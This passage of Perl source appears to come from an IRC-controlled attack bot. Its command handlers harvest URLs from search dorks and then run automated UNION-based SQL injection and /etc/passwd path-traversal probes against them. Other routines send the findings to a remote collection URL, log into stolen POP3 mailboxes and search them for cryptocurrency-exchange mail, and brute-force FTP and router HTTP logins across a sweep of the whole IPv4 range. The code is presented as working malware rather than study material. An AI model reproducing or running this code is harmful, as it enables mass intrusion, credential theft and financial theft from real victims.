						(@rfi_urls,@rfi_sites) = ();
						exit;
					}
					exit;
				}
			}
			elsif(($irc_parsed1[3] eq ":!lfi") && ($irc_parsed1[5])){
				my($dork,$com,$net,$org);
				for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				my $sc1 = fork;
				if($sc1){ waitpid($sc1,0); } elsif($sc1 == 0){ my $sc2 = fork;
					if($sc2){ send_msg($irc_parsed1[0],"[LFI] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
					elsif($sc2==0){
					$com = $dork."+site:com"; $net = $dork."+site:net"; $org = $dork."+site:org";
						send_msg($channel,"[LFI] [Onet] Dork: \"$dork\" - Results: " . &rfi_onet($dork,"0")); $uc=0;
						send_msg($channel,"[LFI] [Onet] Dork: \"$net\" - Results: " . &rfi_onet($net,"0")); $uc=0;
						send_msg($channel,"[LFI] [Onet] Dork: \"$com\" - Results: " . &rfi_onet($com,"0")); $uc=0;
						send_msg($channel,"[LFI] [Onet] Dork: \"$org\" - Results: " . &rfi_onet($org,"0")); $uc=0;
						if($#rfi_urls){ #send_msg($channel,"[RFI] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
							&url_validate("LFI","",@rfi_urls); send_msg($channel,"[LFI] Dork: \"$dork\" - Finished");
						} else{ send_msg($channel,"[LFI] [MULTISCAN] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
						(@rfi_urls,@rfi_sites) = ();
						exit;
					}
					exit;
				}
			}
			elsif(($irc_parsed1[3] eq ":!sql") && ($irc_parsed1[5])){
				my($dork,$com,$net,$org);
				for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				my $sc1 = fork; if($sc1){ waitpid($sc1,0); }
				elsif($sc1 == 0){ my $sc2 = fork;
					if($sc2){ send_msg($irc_parsed1[0],"[SQL] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
					elsif($sc2==0){
					$com = $dork."+site:com"; $net = $dork."+site:net"; $org = $dork."+site:org";
						&rfi_onet($dork,"0"); $uc=0;
						&rfi_onet($net,"0"); $uc=0;
						&rfi_onet($com,"0"); $uc=0;
						&rfi_onet($org,"0"); $uc=0;
						if($#rfi_urls){ #send_msg($channel,"[SQL] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
							&url_validate("SQL","",@rfi_urls); #send_msg($channel,"[SQL] Dork: \"$dork\" - Finished");
						} else { send_msg($channel,"[SQL] [MULTISCAN] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
						(@rfi_urls,@rfi_sites) = ();
						exit;
					}
					exit;
				}
			}
			elsif(($irc_parsed1[3] eq ":!dork") && ($irc_parsed1[6])){
				my($dork,$vPage); $vPage = $irc_parsed1[5];
				for(6..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				my $sc1 = fork; if($sc1){ waitpid($sc1,0); }
				elsif($sc1 == 0){ my $sc2 = fork;
					if($sc2){ send_msg($irc_parsed1[0],"[DORK] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
					elsif($sc2==0){
						send_msg($channel,"[DORK] Dork: \"$dork\" Starting");
						send_msg($channel,"[DORK] [ALLTHEWEB] Dork: \"$dork\" - Results: " . &rfi_onet($dork,"0")); $uc=0;
						if($#rfi_urls){ #send_msg($channel,"[DORK] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
							&url_validate("DORK",$vPage,@rfi_urls); send_msg($channel,"[DORK] Dork: \"$dork\" - Finished");
						} else{ send_msg($channel,"[DORK] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
						(@rfi_urls,@rfi_sites) = ();
						exit;
					}
					exit;
				}
			}
			elsif(($irc_parsed1[3] eq ":!google") && ($irc_parsed1[5])){
				my($dork);
				for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
				$dork = substr($dork,0,length($dork)-1);
				my $sc1 = fork; if($sc1){ waitpid($sc1,0); }
				elsif($sc1 == 0){ my $sc2 = fork;
					if($sc2){ send_msg($irc_parsed1[0],"[GOO] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
					elsif($sc2==0){
						send_msg($channel,"[GOO] Dork: \"$dork\" Starting");
						send_msg($channel,"[GOO] [GOOGLE] Dork: \"$dork\" - Results: " . &rfi_onet($dork,"0")); $uc=0;
						if($#rfi_urls){ #send_msg($channel,"[GOO] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
							&url_validate("RFI","",@rfi_urls); send_msg($channel,"[GOO] Dork: \"$dork\" - Finished");
						} else { send_msg($channel,"[GOO] [MULTISCAN] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
						(@rfi_urls,@rfi_sites) = ();
						exit;
					}
					exit;
				}
				}
			########}
		}
	}
}

sub sqlbrute() {
			my $To=$channel;
			my $site=$_[0];
			my $columns=$_[1];
			my $cfin.="--";
			my $cmn.= "+";
			for($column=0;$column<$columns;$column++) {
			$union.=','.$column; $inyection.=','."0x566f6f5f446f6f";
		    if ($column == 0) { $inyection = ''; $union = ''; }
    $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x566f6f5f446f6f".$inyection.$cfin; print($sql."\n");
    $response=&getreq($sql) or print("[SQL]"," Failed to try to find the number of columns, check website\n");
    if($response =~ /Voo_Doo/) {
         $column ++;
         $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
		 send_msg($channel,"[Sql-Brute] $sql"); &dodaj('sqltable', $sql);
	          foreach $tabla(@tabele)
                {
                  chomp($tabla);
        $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x566f6f5f446f6f".$inyection.$cmn."from".$cmn.$tabla.$cfin;
				  $response=&getreq($sql) or die("[-] Impossible to get tables\n");
                  if($response =~ /Voo_Doo/) {
                        print "\n[+] Table $tabla exists...saving in $ARGV[2]";
                        $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
									send_msg($channel,"[Sql-Brute] $sql"); &dodaj('sqlcccc', $sql);
                    						}
                 }
		}
}
			}

sub lfibrute() {
	my $link = $_[0]."./../../../../../../../../../etc/passwd"; $response=&getreq($link);
    if ($response =~ /$lfi_text/) {  send_msg($channel,"[LFI] $link"); &dodaj('lfi', $link);  }
	my $link2 = $_[0]."./../../../../../../../../../etc/passwd%00"; print($link2."\n"); $response2=&getreq($link2);
    if ($response2 =~ /$lfi_text/) {  send_msg($channel,"[LFI] $link2"); &dodaj('lfi', $link2); }
}

use MIME::Base64;

sub dodaj() {
my $co = $_[0]; my $link = $_[1]; my $linkraz = $_[2];
my $links = encode_base64($link); my $lindwa = encode_base64($linkraz);
$links=~s/\n//; $links=~s/\r//;$lindwa=~s/\n//; $lindwa=~s/\r//;

if($co eq "sqlczyste") { my $safet = $savev.'?co=sqlczyste&link='.$links; &getreq($safet); }
elsif ($co eq "sqltable")  { my $safet = $savev.'?co=sqltable&link='.$links; &getreq($safet); }
elsif ($co eq "sqldone")  { my $safet = $savev."?co=sqldone&link=".$links; &getreq($safet); }
elsif ($co eq "sqlcccc")  { my $safet = $savev."?co=sqlcccc&link=".$links; &getreq($safet); }
#--------------------------------------------------------- _SQL
elsif ($co eq "lfi") { my $safet = $savev."?co=lfi&vuln=".$links; &getreq($safet); }
elsif ($co eq "lfi2rce") { my $safet = $savev.'?co=lfi2rce&link='.$links; &getreq($safet); }
elsif ($co eq "lficonf") { my $safet = $savev.'?co=lficonf&link='.$links; &getreq($safet); }
#--------------------------------------------------------- _LFI

			}

sub pop3() {
my $dork = $_[0]; print($dork."\n");
my ($user,$password)=split(/:/,$dork);
my ($lol,$host) = split(/@/,$user);
#&send_msg($channel,"Dork: $dork USer: $user Pass: $password Dom $host Lol: $lol ");
if($sockz = new IO::Socket::INET(PeerAddr => $host,PeerPort => 110,Proto => 'tcp',Timeout=>'1')) {
$n = sysread($sockz, $buffer, 4096);
if (substr($buffer, 0, 3) ne "+OK") { print "Problem with pop server\n"; exit(0); } else { print "$buffer"."Opening message successfully read\n"; }

$buffer = "USER $user\r\n";
syswrite($sockz, $buffer, length($buffer));
$n = sysread($sockz, $buffer, 4096);
if (substr($buffer, 0, 3) ne "+OK") { print "Username incorrect\n"; exit(0); } else { print "USER command successfully sent\n$buffer"; }

$buffer = "PASS $password\r\n";
syswrite($sockz, $buffer, length($buffer));
$n = sysread($sockz, $buffer, 4096);
if (substr($buffer, 0, 3) ne "+OK") { print "Password incorrect\n"; exit(0); } else { print "PASS command successfully sent\n$buffer";  }

$buffer = "STAT\r\n";
syswrite($sockz, $buffer, length($buffer));
$n = sysread($sockz, $buffer, 4096);
chop $buffer; chop $buffer;
($OK, $messages, $octets) = split(/ /, $buffer, 3);
if ($OK ne "+OK") { print "STAT command error\n"; exit(0); } else { print "STAT command successfully sent\n$buffer\n"; }
$mess = "message"; if ($messages != 1) { $mess.= "s"; } $octmess = "octet"; if ($octets != 1) { $octmess.= "s"; }
print "POP server \"$host\" has $messages $mess "; print "for \"$user\" ($octets $octmess)\n";
&send_msg($channel," $user:$password Email: has $messages $mess Server pop3: $host  ");  sleep(2);
&nag($user,$password,$host);

$buffer = "QUIT\r\n";
syswrite($sockz, $buffer, length($buffer));
$n = sysread($sockz, $buffer, 4096);
if (substr($buffer, 0, 3) ne "+OK") { print "QUIT command error\n";  exit(0); } else { print "QUIT command successfully sent\n $buffer"; }

close ($sockz);
} exit(0);
}

sub nag() {
	my $riri; my $lu; my $i;
	my $username = $_[0]; my $password = $_[1]; my $domena = $_[2]; print($username,$password,$domena."zzzzzzzzzzzzzzzzzzzzzzzzzz\n");
  $riri = new Mail::POP3Client( USER     => $username, PASSWORD => $password, HOST => $domena );
  for ($i = 1; $i <= $riri->Count(); $i++) {
   foreach ( $riri->Head( $i ) ) { /^(From|Subject):\s+/i and  $lu = $_;
#    foreach ( $riri->Head( $i ) ) { /^(From):\s+/i and  $lu = $_;
 print($lu."\n");
#--------------------------- $$$
if($lu =~ /zxc/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/blockchain"); }
elsif($lu =~ /4coins/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/4coins"); }
elsif($lu =~ /bitmarket/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/bitmarket"); }
elsif($lu =~ /dgtmarket/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/dgtmarket"); }

elsif($lu =~ /bitbay/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/bitbay"); }
elsif($lu =~ /BitBay/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/bitbay"); }
elsif($lu =~ /wallet/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:wallet"); }

 }


}   }


sub router_ftp() {
  my ($host) = shift;
  		  my ($zuser,$zpass);
  my $ftp = Net::FTP->new($host,Timeout=>'1') or return;


  # grab banner
  my $banner = $ftp->message;
  $banner =~ s/\n/ /g;
                  &send_msg($channel,"Anonymous FTP: ftp://$host/ Banner: $banner");
foreach my $cred(@http_AU_Voo) {

				my ($zuser,$zpass)=split(/:/,$cred);
		  #print($zuser, $zpass."\n");
		    #

        if($ftp->login($zuser, $zpass)) {
			                  &send_msg($channel,'crac FTP: ftp://'.$zuser.':'.$zpass.'\@$host ');

          &send_msg($channel,"ftp://$zuser:$zpass\@$host");
          #	print($user, $pass."\n");
          $ftp->quit;
           #$zpm->finish;
          return;
        } else {
          next;


#    return;

  # Anonymous checker
  if ($ftp->login('anonymous', 'no@gov.com')) {

                &send_msg($channel,"Anonymous FTP: ftp://$host/ Banner: $banner");
        }   else {
    &send_msg($channel,"Anonymous FTP: ftp://$host/ Banner: $banner");


    return;
  } # end anonymous


 } }


  } # end brute force

sub router_attack()
{
      my $target=shift;
      if ($sox = IO::Socket::INET->new(PeerAddr=>$target,PeerPort=>80,Proto=>'tcp',Timeout=>'1'))
          { print($target." OPEN\n");
               my $cos = "http://".$target."/";
               my $strona = &getreq($cos);
               if($strona =~ /<title>(.*)<\/title>/i)
               {
               sleep(2); #send_msg($channel,"[Open] http://".$target."/ => $1");
               #                         print $pwnage_ban "$1 => $cos \n";
               }
               if($strona=~/401|unauthorized|Authentication|Protected Object|Protected/i)
               {
               #          &msg('[DEBUG] => Odkrylem 401 ... napierdalaaamy $target !');
                     &passwd($target);
           }
           else
           {
#                &msg('[DEBUG]','Kurwa, cos nie tak z soketem, moj Wladco Karaluchow ;D');
           }
               close $sox;
          }
}
 sub passwdftp() {
my $ss;     my $host = $_[0];
  my $ftp = Net::FTP->new($host,Timeout=>'3') or return;
}
 sub passwd()
{
     my $ip = "http://".$_[0]."/";
     foreach my $cred(@http_AU_Voo)
     {
               my $ua = LWP::UserAgent->new;
               my $req = HTTP::Request->new(GET => $ip);
                  my ($user,$pass)=split(/:/,$cred);
               $req->authorization_basic($user,$pass);
               my $te = $ua->request($req)->as_string;
               if($te =~ /HTTP\/1.1 200 OK/)
               { if($pass =~ /to_JEST_FEJK/) { exit; }
                    #print("$ip $user $pass");
                    &send_msg($channel,"V_Cracked > ".$ip." Login $user Password $pass");
                    # TUTAJ SUB DODAJ BEDZIE
                    # print $pwnage_has "$ip:$user:$pass \n";
                    my $jedne = $ip;
                    my $dwa = $user.":".$pass;
                    #spread::dodaj('router',$jedne,$dwa);
                    return;
               }
     }
}
#UKRUCIIC TE GOWNO DOWN
sub main {

my($ipa, $ipb, $ipc, $ipd) = ($_[0] =~ m/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/) or die("Append start IP.\n");
my $dwa=$_[1];
  print "Start scanning...\nBe patient.\n";
  my $OUTPUT_AUTOFLUSH = 1; # To avoid buffering problems with fork()
  # loop through IPs
  while (1) {
    for my $a ($ipa..255) {

      if ($a == 10 || $a == 198 || $a == 127 || $a == 0 || $a == 172 || $a == 1) { next; }

      for my $b ($ipb..255) {
        for my $c ($ipc..255) {
          for my $d ($ipd..255) {

            if (fork() == 0) {
              #print "$a.$b.$c.$d\n"; # Uncomment for verbose output
              if($dwa eq "rou") { &router_attack("$a.$b.$c.$d"); }
              if($dwa eq "ftp") { &router_ftp("$a.$b.$c.$d"); }
              exit;
            } else {
              $childs++;
              if ($childs >= $config{'max_childs'}) { wait(); $childs--; }
            }

          } # end $d
        } # end $c
      } # end $b
    } #end $a

  } # end while

} #end main()

use LWP::Simple;
###------------ Pobierz
sub getstore ($$)
{

  my $url = shift;
  my $file = shift;
  						system("wget ".$url." -O ".$file);

  $http_stream_out = 1;
  open(GET_OUTFILE, "> $file");
  %http_loop_check = ();
  _get($url);
  close GET_OUTFILE;
  return $main::http_get_result;
}

sub _get
{
  my $url = shift;
  my $proxy = "";
  grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
  if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
    my $host = $1;
    my $port = $2 || 80;
    my $path = $3;
    $path = "/" unless defined($path);
    return _trivial_http_get($host, $port, $path);
  } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
    my $host = $1;
    my $port = $2;
    my $path = $url;
    return _trivial_http_get($host, $port, $path);
  } else {
    return undef;
  }
}


sub _trivial_http_get
{
  my($host, $port, $path) = @_;
  my($AGENT, $VERSION, $p);
  $AGENT = "get-minimal";
  $VERSION = "20000118";
  $path =~ s/ /%20/g;

  require IO::Socket;
  local($^W) = 0;
  my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                   PeerPort => $port,
                                   Proto   => 'tcp',
                                   Timeout  => 60) || return;
  $sock->autoflush;
  my $netloc = $host;
  $netloc .= ":$port" if $port != 80;
  my $request = "GET $path HTTP/1.0\015\012"
              . "Host: $netloc\015\012"
              . "User-Agent: $AGENT/$VERSION/u\015\012";
  $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
  $request .= "\015\012";
  print $sock $request;

  my $buf = "";
  my $n;
  my $b1 = "";
  while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
    if ($b1 eq "") {
      $b1 = $buf;
      $buf =~ s/.+?\015?\012\015?\012//s;
    }
    if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
  }
  return undef unless defined($n);
  $main::http_get_result = 200;
  if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
    $main::http_get_result = $1;
    if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
      my $url = $1;
      return undef if $http_loop_check{$url}++;
      return _get($url);
    }
    return undef unless $main::http_get_result =~ /^2/;
  }

  return $buf;
}